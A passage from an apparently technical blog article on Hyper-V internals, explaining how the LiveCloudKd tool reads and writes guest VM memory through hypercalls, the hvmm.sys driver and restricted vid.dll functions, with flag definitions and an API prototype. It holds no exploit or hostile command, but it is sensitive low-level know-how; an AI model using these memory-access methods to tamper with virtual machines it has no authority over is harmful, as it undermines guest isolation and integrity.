<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Now we can see key difference between reading container memory from reading Full VM memory: we need copy data from virtual memory of the vmmem process. There is no need for memory mapping using MDL.</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: center; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Hyper-V memory API</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Direct access to memory without corresponding exported Windows functions is interesting, but a more reliable method is to use some of APIs, which is provided by Microsoft. But for reliability you will have to pay the restrictions imposed by Microsoft on these APIs. In particular, for hypercalls they work only with Full VM and for containers they always return FALSE, additionally they read\write no more than 0x10 bytes at one time. The vid.dll function API is generally forbidden to be called from any module other than the vmwp.exe process in latest versions of Windows.</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Vid.dll has next functions for reading\writing memory:</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<ul style="margin-bottom: 0; margin-top: 0;">
<li dir="ltr" style="background-color: transparent; color: black; font-family: 'Noto Sans Symbols',sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; margin-left: 35.45pt; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">VidTranslateGvaToGpa</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: 'Noto Sans Symbols',sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; margin-left: 35.45pt; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">VidReadMemoryBlockPageRange (wrapper on vid.sys!VidReadWriteMemoryBlockPageRange)</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: 'Noto Sans Symbols',sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; margin-left: 35.45pt; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">VidWriteMemoryBlockPageRange (wrapper on vid.sys!VidReadWriteMemoryBlockPageRange)</span></div>
</li>
</ul>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">And hypercalls (it must be called from ring 0):</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<ul style="margin-bottom: 0; margin-top: 0;">
<li dir="ltr" style="background-color: transparent; color: black; font-family: 'Noto Sans Symbols',sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; margin-left: 35.45pt; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">HvTranslateVirtualAddress</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: 'Noto Sans Symbols',sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; margin-left: 35.45pt; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">HvWriteGPA</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: 'Noto Sans Symbols',sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; margin-left: 35.45pt; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">HvReadGPA</span></div>
</li>
</ul>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">See it in more detailed.</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: center; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Reading\writing memory using hypercalls</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">HvReadGpa using is quite simple, if you don’t take, that memory block shouldn’t fall on the page boundary. Otherwise, the reading operation will be broken and end of block, that must be read from the second page, will contain zero bytes. Blocking separation is implemented in the usermode part of LiveCloudKdSdk. Driver hvmm calls WinHvReadGPA - HvReadGpa wrapper from winhvr.sys driver. You can call HvReadGpa directly through vmcall, but before you will have to additionally perform operations to prepare hypercall parameters.</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 53px; overflow: hidden; width: 624px;"><img height="53" src="https://lh4.googleusercontent.com/9_EYwlFDlMdn9-Urxl7N7FgWUHc8jCfTwb4bYxEPUMOmtcEf9BCydcTpxGOa4dU8XnEvdTc_yNCSARZifLY0SHo_Pw1ZnmlAfuG4V38GznMr9uCKnSfoZWyHKasQlC_y28IOCS4" style="margin-left: 0px; margin-top: 0px;" width="624" /></span></span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Boundary checking for writing operation was made in hvmm.sys driver.</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 89px; overflow: hidden; width: 577px;"><img height="89" src="https://lh3.googleusercontent.com/FDLbPx0CEfkrHCU8uIVkIejvsDwBl-8KmbQTAeNpF4h1Q5RogPl5vqHTIkU1dIPl39focov8vbedAnqT1Pf-LUcLr0F1mC8tOa5puM7bzWNTkuAiMNi9rBx-qQ-Pcs8kjclpgMI" style="margin-left: 0px; margin-top: 0px;" width="577" /></span></span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">An additional check is performed before reading virtual address space, using winhvr.sys!WinHvTranslateVirtualAddress. The function converts a virtual address into a physical one using the current CPU context (and, accordingly, the CR3 register).</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Possible validation flags (LiveCloudKd uses only HV_TRANSLATE_GVA_VALIDATE_READ and HV_TRANSLATE_GVA_VALIDATE_WRITE):</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: grey; font-family: "consolas" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">#define</span><span style="background-color: transparent; color: black; font-family: "consolas" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: #6f008a; font-family: "consolas" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">HV_TRANSLATE_GVA_VALIDATE_READ</span><span style="background-color: transparent; color: black; font-family: "consolas" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> (0x0001)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: grey; font-family: "consolas" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">#define</span><span style="background-color: transparent; color: black; font-family: "consolas" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: #6f008a; font-family: "consolas" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">HV_TRANSLATE_GVA_VALIDATE_WRITE</span><span style="background-color: transparent; color: black; font-family: "consolas" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> (0x0002)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: grey; font-family: "consolas" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">#define</span><span style="background-color: transparent; color: black; font-family: "consolas" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: #6f008a; font-family: "consolas" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">HV_TRANSLATE_GVA_VALIDATE_EXECUTE</span><span style="background-color: transparent; color: black; font-family: "consolas" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> (0x0004)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: grey; font-family: "consolas" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">#define</span><span style="background-color: transparent; color: black; font-family: "consolas" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: #6f008a; font-family: "consolas" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">HV_TRANSLATE_GVA_PRIVILEGE_EXEMPT</span><span style="background-color: transparent; color: black; font-family: "consolas" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> (0x0008)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: grey; font-family: "consolas" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">#define</span><span style="background-color: transparent; color: black; font-family: "consolas" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: #6f008a; font-family: "consolas" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">HV_TRANSLATE_GVA_SET_PAGE_TABLE_BITS</span><span style="background-color: transparent; color: black; font-family: "consolas" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> (0x0010)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: grey; font-family: "consolas" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">#define</span><span style="background-color: transparent; color: black; font-family: "consolas" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: #6f008a; font-family: "consolas" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">HV_TRANSLATE_GVA_TLB_FLUSH_INHIBIT</span><span style="background-color: transparent; color: black; font-family: "consolas" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> (0x0020)</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: grey; font-family: "consolas" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">#define</span><span style="background-color: transparent; color: black; font-family: "consolas" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: #6f008a; font-family: "consolas" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">HV_TRANSLATE_GVA_CONTROL_MASK</span><span style="background-color: transparent; color: black; font-family: "consolas" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> (0x003F)</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinDBG in memory dump mode works with physical addresses only (for the debugger these are file offsets). Accordingly, it does all the work of converting virtual addresses to physical ones itself, so we don’t need an additional hypercall to check the memory address.</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Microsoft Hyper-V Virtualization Infrastructure Driver Library (vid.dll) API</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">First, see vid.dll!VidReadMemoryBlockPageRange:</span></div>
</div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: #6f008a; font-family: "consolas" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">VIDDLLAPI</span><span style="background-color: transparent; color: black; font-family: "consolas" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: #2b91af; font-family: "consolas" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">BOOL</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: #6f008a; font-family: "consolas" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WINAPI</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "consolas" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">VidReadMemoryBlockPageRange(</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "consolas" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: #6f008a; font-family: "consolas" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">__in</span><span style="background-color: transparent; color: black; font-family: "consolas" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: #2b91af; font-family: "consolas" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">PT_HANDLE</span><span style="background-color: transparent; color: black; font-family: "consolas" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: grey; font-family: "consolas" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Partition</span><span style="background-color: transparent; color: black; font-family: "consolas" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">,</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "consolas" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: #6f008a; font-family: "consolas" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">__in</span><span style="background-color: transparent; color: black; font-family: "consolas" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: #2b91af; font-family: "consolas" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">MB_HANDLE</span><span style="background-color: transparent; color: black; font-family: "consolas" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: grey; font-family: "consolas" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">MemoryBlock</span><span style="background-color: transparent; color: black; font-family: "consolas" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">,</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "consolas" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: #6f008a; font-family: "consolas" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">__in</span><span style="background-color: transparent; color: black; font-family: "consolas" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: #2b91af; font-family: "consolas" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">MB_PAGE_INDEX</span><span style="background-color: transparent; color: black; font-family: "consolas" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: grey; font-family: "consolas" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">StartMbp</span><span style="background-color: transparent; color: black; font-family: "consolas" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">,</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "consolas" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: #6f008a; font-family: "consolas" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">__in</span><span style="background-color: transparent; color: black; font-family: "consolas" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: #2b91af; font-family: "consolas" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">UINT64</span><span style="background-color: transparent; color: black; font-family: "consolas" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: grey; font-family: "consolas" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">MbpCount</span><span style="background-color: transparent; color: black; font-family: "consolas" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">,</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "consolas" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: #6f008a; font-family: "consolas" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">__out_bcount</span><span style="background-color: transparent; color: black; font-family: "consolas" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">(</span><span style="background-color: transparent; color: grey; font-family: "consolas" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">BufferSize</span><span style="background-color: transparent; color: black; font-family: "consolas" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">) </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "consolas" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: #2b91af; font-family: "consolas" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">PVOID</span><span style="background-color: transparent; color: black; font-family: "consolas" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: grey; font-family: "consolas" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ClientBuffer</span><span style="background-color: transparent; color: black; font-family: "consolas" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">,</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "consolas" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: #6f008a; font-family: "consolas" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">__in</span><span style="background-color: transparent; color: black; font-family: "consolas" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: #2b91af; font-family: "consolas" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">UINT64</span><span style="background-color: transparent; color: black; font-family: "consolas" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: grey; font-family: "consolas" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">BufferSize</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "consolas" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">);</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Partition – the user mode partition handle;</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ClientBuffer – pointer to the memory region where the result will be stored;</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">BufferSize – yes, buffer size, and nothing more;</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Two parameters may raise questions: MemoryBlock and StartMbp. MemoryBlock is the number of the MBlock object from which data will be read. In Windows Server 2008 R2 a kernel mode handle had to be passed as this parameter (yes, the user mode application contained kernel mode descriptor addresses; the original version of LiveCloudKd was built on this logic):</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
